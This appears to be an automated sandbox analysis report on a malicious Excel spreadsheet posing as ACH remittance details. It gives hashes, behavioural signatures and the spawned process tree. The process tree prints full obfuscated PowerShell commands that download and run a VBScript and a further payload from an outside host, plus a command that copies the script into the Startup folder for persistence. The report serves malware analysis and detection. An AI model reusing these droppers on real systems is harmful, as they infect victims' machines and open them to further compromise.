Analysis
-
max time kernel
146s -
max time network
147s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
23-08-2022 08:57
Behavioral task
behavioral1
Sample
ACH Remittance Details.xls
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
ACH Remittance Details.xls
Resource
win10v2004-20220812-en
General
-
Target
ACH Remittance Details.xls
-
Size
29KB
-
MD5
135a1b45054fd8c36e854fb696d7391a
-
SHA1
80e56aad8cf5281d4374ae3b3f99ae7bd3f46198
-
SHA256
7e59886a1137a4e857507cc61b150d5637ff71b09af43deeb70d1c9644ce465e
-
SHA512
445bec2c31074256f9da3afda2034f150cf8fe3fa6e1441a70a7d4a0068c56c046df8f1269fe4d5d6e7f500699be61521a1c011b4d2ad48a2eb64c9e8958a498
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 420 4380 powershell.exe EXCEL.EXE -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exepowershell.exeflow pid process 25 420 powershell.exe 46 3512 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\AdminActive\{7124B5FD-22D2-11ED-89AC-4AA92575F981} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\MINIE iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = f0a0304bdfb6d801 iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000975fab978604b14697eb522259e91a100000000002000000000010660000000100002000000011998a8b9283631660250c46eb3c26fa27b641e9d65d31b5193b391cceb1b769000000000e8000000002000020000000dfa46012540e828485e3c43918405f0297e3ab60cfdc820f569fd1604982d3fc20000000f1549905d2c7db8ad86df520d58ec42055d5e1c83fe9c64ae0896cb9edc48fb340000000718761d5af3400ee5b3c5fafd395f7ae252c3ad06714d36361d0c52a1a96c8ea982253e8c322a6fe6e581d4b180a74d54bcab562c68b53e75106eaa60093bef5 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 9055544bdfb6d801 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\IESettingSync IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000975fab978604b14697eb522259e91a1000000000020000000000106600000001000020000000996d05712578e16207f596dc8ae080e7ace39965eab063499d80b2d9a0dd6827000000000e8000000002000020000000241182108b532b9a44edb68a7d9eb32a4805d6c9a46b8637c45ea1b5b7365495200000001b06586b91053880ed2cd4abe81e56b0354bffc55508d19c85d5e3499e04cd6740000000de3f82bfadafa81a72fe520b743c2316a4ee418ec1447828da758daec64b841232a225491bcf7acb1bfacd2aa8715605940e0deded734ff2a11fcfab8e785c0c iexplore.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 4380 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 420 powershell.exe 420 powershell.exe 2356 powershell.exe 3512 powershell.exe 3512 powershell.exe 2356 powershell.exe 2356 powershell.exe 3512 powershell.exe -
Suspicious use of AdjustPrivilegeToken 45 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 420 powershell.exe Token: SeDebugPrivilege 2356 powershell.exe Token: SeDebugPrivilege 3512 powershell.exe Token: SeIncreaseQuotaPrivilege 3512 powershell.exe Token: SeSecurityPrivilege 3512 powershell.exe Token: SeTakeOwnershipPrivilege 3512 powershell.exe Token: SeLoadDriverPrivilege 3512 powershell.exe Token: SeSystemProfilePrivilege 3512 powershell.exe Token: SeSystemtimePrivilege 3512 powershell.exe Token: SeProfSingleProcessPrivilege 3512 powershell.exe Token: SeIncBasePriorityPrivilege 3512 powershell.exe Token: SeCreatePagefilePrivilege 3512 powershell.exe Token: SeBackupPrivilege 3512 powershell.exe Token: SeRestorePrivilege 3512 powershell.exe Token: SeShutdownPrivilege 3512 powershell.exe Token: SeDebugPrivilege 3512 powershell.exe Token: SeSystemEnvironmentPrivilege 3512 powershell.exe Token: SeRemoteShutdownPrivilege 3512 powershell.exe Token: SeUndockPrivilege 3512 powershell.exe Token: SeManageVolumePrivilege 3512 powershell.exe Token: 33 3512 powershell.exe Token: 34 3512 powershell.exe Token: 35 3512 powershell.exe Token: 36 3512 powershell.exe Token: SeIncreaseQuotaPrivilege 3512 powershell.exe Token: SeSecurityPrivilege 3512 powershell.exe Token: SeTakeOwnershipPrivilege 3512 powershell.exe Token: SeLoadDriverPrivilege 3512 powershell.exe Token: SeSystemProfilePrivilege 3512 powershell.exe Token: SeSystemtimePrivilege 3512 powershell.exe Token: SeProfSingleProcessPrivilege 3512 powershell.exe Token: SeIncBasePriorityPrivilege 3512 powershell.exe Token: SeCreatePagefilePrivilege 3512 powershell.exe Token: SeBackupPrivilege 3512 powershell.exe Token: SeRestorePrivilege 3512 powershell.exe Token: SeShutdownPrivilege 3512 powershell.exe Token: SeDebugPrivilege 3512 powershell.exe Token: SeSystemEnvironmentPrivilege 3512 powershell.exe Token: SeRemoteShutdownPrivilege 3512 powershell.exe Token: SeUndockPrivilege 3512 powershell.exe Token: SeManageVolumePrivilege 3512 powershell.exe Token: 33 3512 powershell.exe Token: 34 3512 powershell.exe Token: 35 3512 powershell.exe Token: 36 3512 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 2180 iexplore.exe -
Suspicious use of SetWindowsHookEx 16 IoCs
Processes:
EXCEL.EXEiexplore.exeIEXPLORE.EXEpid process 4380 EXCEL.EXE 4380 EXCEL.EXE 4380 EXCEL.EXE 4380 EXCEL.EXE 4380 EXCEL.EXE 4380 EXCEL.EXE 4380 EXCEL.EXE 4380 EXCEL.EXE 4380 EXCEL.EXE 4380 EXCEL.EXE 4380 EXCEL.EXE 4380 EXCEL.EXE 2180 iexplore.exe 2180 iexplore.exe 2864 IEXPLORE.EXE 2864 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
EXCEL.EXEpowershell.exeiexplore.exeWScript.exedescription pid process target process PID 4380 wrote to memory of 420 4380 EXCEL.EXE powershell.exe PID 4380 wrote to memory of 420 4380 EXCEL.EXE powershell.exe PID 420 wrote to memory of 3984 420 powershell.exe WScript.exe PID 420 wrote to memory of 3984 420 powershell.exe WScript.exe PID 2180 wrote to memory of 2864 2180 iexplore.exe IEXPLORE.EXE PID 2180 wrote to memory of 2864 2180 iexplore.exe IEXPLORE.EXE PID 2180 wrote to memory of 2864 2180 iexplore.exe IEXPLORE.EXE PID 3984 wrote to memory of 3512 3984 WScript.exe powershell.exe PID 3984 wrote to memory of 3512 3984 WScript.exe powershell.exe PID 3984 wrote to memory of 2356 3984 WScript.exe powershell.exe PID 3984 wrote to memory of 2356 3984 WScript.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\ACH Remittance Details.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4380 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.tneilc\''+pmet:vne$,''sbv.tneilC/clac/nomwen/moc.ehgityennikcm//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX(([regex]::Matches($TC,'.','RightToLeft') | ForEach {$_.value}) -join '');start-process($env:temp+ '\client.vbs')2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:420 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\client.vbs"3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3984 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $gf=(00100100,01000101,01110010,01110010,01101111,01110010,01000001,01100011,01110100,01101001,01101111,01101110,01010000,01110010,01100101,01100110,01100101,01110010,01100101,01101110,01100011,01100101,00100000,00111101,00100000,00100111,01010011,01101001,01101100,01100101,01101110,01110100,01101100,01111001,01000011,01101111,01101110,01110100,01101001,01101110,01110101,01100101,00100111,00111011,00100100,01110100,00110101,00110110,01100110,01100111,00100000,00111101,00100000,01011011,01000101,01101110,01110101,01101101,01011101,00111010,00111010,01010100,01101111,01001111,01100010,01101010,01100101,01100011,01110100,00101000,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,01010100,01111001,01110000,01100101,01011101,00101100,00100000,00110011,00110000,00110111,00110010,00101001,00111011,01011011,01010011,01111001,01110011,01110100,01100101,01101101,00101110,01001110,01100101,01110100,00101110,01010011,01100101,01110010,01110110,01101001,01100011,01100101,01010000,01101111,01101001,01101110,01110100,01001101,01100001,01101110,01100001,01100111,01100101,01110010,01011101,00111010,00111010,01010011,01100101,01100011,01110101,01110010,01101001,01110100,01111001,01010000,01110010,01101111,01110100,01101111,01100011,01101111,01101100,00100000,00111101,00100000,00100100,01110100,00110101,00110110,01100110,01100111,00111011,01000001,01100100,01100100,00101101,01010100,01111001,01110000,01100101,00100000,00101101,01000001,01110011,01110011,01100101,01101101,01100010,01101100,01111001,01001110,01100001,01101101,01100101,00100000,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00111011,01100100,01101111,00100000,01111011,00100100,01110000,01101001,01101110,01100111,00100000,00111101,00100000,01110100,01100101,01110011,01110100,00101101,01100011,01101111,01101110,01101110,01100101,01100011,01110100,01101001,01101111,01101110,00100000,00101101,01100011,01101111,01101101,01110000,00100000,01100111,01101111,01101111,01100111,01101100,01100101,00101110,01100011,01101111,01101101,00100000,00101101,01100011,01101111,01110101,01101110,01110100,00100000,00110001,00100000,00101101,01010001,01110101,01101001,01100101,01110100,01111101,00100000,01110101,01101110,01110100,01101001,01101100,00100000,00101000,00100100,01110000,01101001,01101110,01100111,00101001,00111011,00100100,01110100,01110100,01111001,00111101,01010000,00101000,00100111,00101000,01001110,01100101,01110111,00101101,00100111,00101011,00100111,01001111,01100010,01101010,01100101,00100111,00101011,00100111,01100011,01110100,00100000,01001110,01100101,00100111,00101011,00100111,01110100,00101110,01010111,01100101,00100111,00101011,00100111,01100010,01000011,01101100,01101001,00100111,00101011,00100111,01100101,01101110,01110100,00101001,00100111,00101001,00111011,00100100,01101101,01110110,00111101,00100000,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01001001,01101110,01110100,01100101,01110010,01100001,01100011,01110100,01101001,01101111,01101110,01011101,00111010,00111010,01000011,01100001,01101100,01101100,01000010,01111001,01101110,01100001,01101101,01100101,00101000,00100100,01110100,01110100,01111001,00101100,00100111,01000100,01101111,01110111,01101110,00100111,00100000,00101011,00100000,00100111,01101100,01101111,01100001,01100100,00100111,00100000,00101011,00100000,00100111,01010011,01110100,01110010,00100111,00100000,00101011,00100000,00100111,01101001,01101110,01100111,00100111,00101100,01011011,01001101,01101001,01100011,01110010,01101111,01110011,01101111,01100110,01110100,00101110,01010110,01101001,01110011,01110101,01100001,01101100,01000010,01100001,01110011,01101001,01100011,00101110,01000011,01100001,01101100,01101100,01010100,01111001,01110000,01100101,01011101,00111010,00111010,01001101,01100101,01110100,01101000,01101111,01100100,00101100,00100111,01101000,01110100,01110100,01110000,00100111,00100000,00101011,00100000,00100111,00111010,00101111,00101111,01101101,01100011,01101011,01101001,01101110,01101110,01100101,01111001,01110100,01101001,01100111,01101000,01100101,00101110,01100011,01101111,01101101,00101111,01101110,01100101,01110111,01101101,01101111,01101110,00101111,01000101,01101110,01100011,01110010,01111001,01110000,01110100,01100101,01100100,00100000,01000011,01101100,01101001,01100101,01101110,01110100,00100000,01001111,01000111,00101110,01101010,01110000,01100111,00100111,00101001,01111100,01010000) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) };$o00='ZE000'.replace('Z','I').replace('000','x');sal P $o00;([system.String]::Join('', $gf))|P4⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3512 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-item 'C:\Users\Admin\AppData\Local\Temp\client.vbs' -Destination 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\client.vbs'4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2356
-
C:\Program Files (x86)\Internet Explorer\ielowutil.exe"C:\Program Files (x86)\Internet Explorer\ielowutil.exe" -CLSID:{0002DF01-0000-0000-C000-000000000046} -Embedding1⤵PID:3524
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" -Embedding1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2180 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2180 CREDAT:17410 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:2864
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD571444def27770d9071039d005d0323b7
SHA1cef8654e95495786ac9347494f4417819373427e
SHA2568438eded7f1ab9b4399a069611fe8730226bcdce08fab861d4e8fae6ef621ec9
SHA512a721af797fd6882e6595b7d9610334f1fb57b809e504452eed4b0d0a32aaf07b81ce007bd51605bec9fcea7ec9f1d8424db1f0f53b65a01126ec4f5980d86034
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5454f9e7fa8aad19d6bac74d19b3086b2
SHA1fd31e6cf15a019921faf239343ace0da3cfb06c2
SHA2560f3226ebe6776806997c74f28e76ad5eb235909b8645d43d3564d823fc7834f2
SHA512763af517762363994c0da1bbeef555ce4d8e7928b8dc9ece3aa90a24a232490f990c1948687957c55df2b010cc95c08267e4c5df48645739c70416c60a54840e
-
C:\Users\Admin\AppData\Local\Temp\client.vbsFilesize
2KB
MD55a060aa2e0e82ee0b03b65ce9ed52c2f
SHA1c8ef799fb03c6ae42b6f7590d7733c80f54c7c5a
SHA256a224dcb4bd0ac20f6241885b3cd0ca5f552dc6ddcca360d27204bd9c47cec4a7
SHA512dcf9218da529ae6eeacea9e53ad94f2d3649d27561a721ac9a23abaa49dac0ed11f5b6cd203750247d93e577ce772e3e6afc9bd992348f260875e8903bbcb5f6
-
memory/420-140-0x0000018E7E2C0000-0x0000018E7E2E2000-memory.dmpFilesize
136KB
-
memory/420-144-0x00007FFE767A0000-0x00007FFE77261000-memory.dmpFilesize
10.8MB
-
memory/420-141-0x00007FFE767A0000-0x00007FFE77261000-memory.dmpFilesize
10.8MB
-
memory/420-139-0x0000000000000000-mapping.dmp
-
memory/2356-150-0x00007FFE759A0000-0x00007FFE76461000-memory.dmpFilesize
10.8MB
-
memory/2356-146-0x0000000000000000-mapping.dmp
-
memory/2356-152-0x00007FFE759A0000-0x00007FFE76461000-memory.dmpFilesize
10.8MB
-
memory/3512-149-0x00007FFE759A0000-0x00007FFE76461000-memory.dmpFilesize
10.8MB
-
memory/3512-151-0x00007FFE759A0000-0x00007FFE76461000-memory.dmpFilesize
10.8MB
-
memory/3512-145-0x0000000000000000-mapping.dmp
-
memory/3512-154-0x00007FFE759A0000-0x00007FFE76461000-memory.dmpFilesize
10.8MB
-
memory/3984-142-0x0000000000000000-mapping.dmp
-
memory/4380-132-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmpFilesize
64KB
-
memory/4380-138-0x00007FFE5D230000-0x00007FFE5D240000-memory.dmpFilesize
64KB
-
memory/4380-136-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmpFilesize
64KB
-
memory/4380-134-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmpFilesize
64KB
-
memory/4380-135-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmpFilesize
64KB
-
memory/4380-133-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmpFilesize
64KB
-
memory/4380-137-0x00007FFE5D230000-0x00007FFE5D240000-memory.dmpFilesize
64KB
-
memory/4380-156-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmpFilesize
64KB
-
memory/4380-157-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmpFilesize
64KB
-
memory/4380-158-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmpFilesize
64KB
-
memory/4380-159-0x00007FFE5F790000-0x00007FFE5F7A0000-memory.dmpFilesize
64KB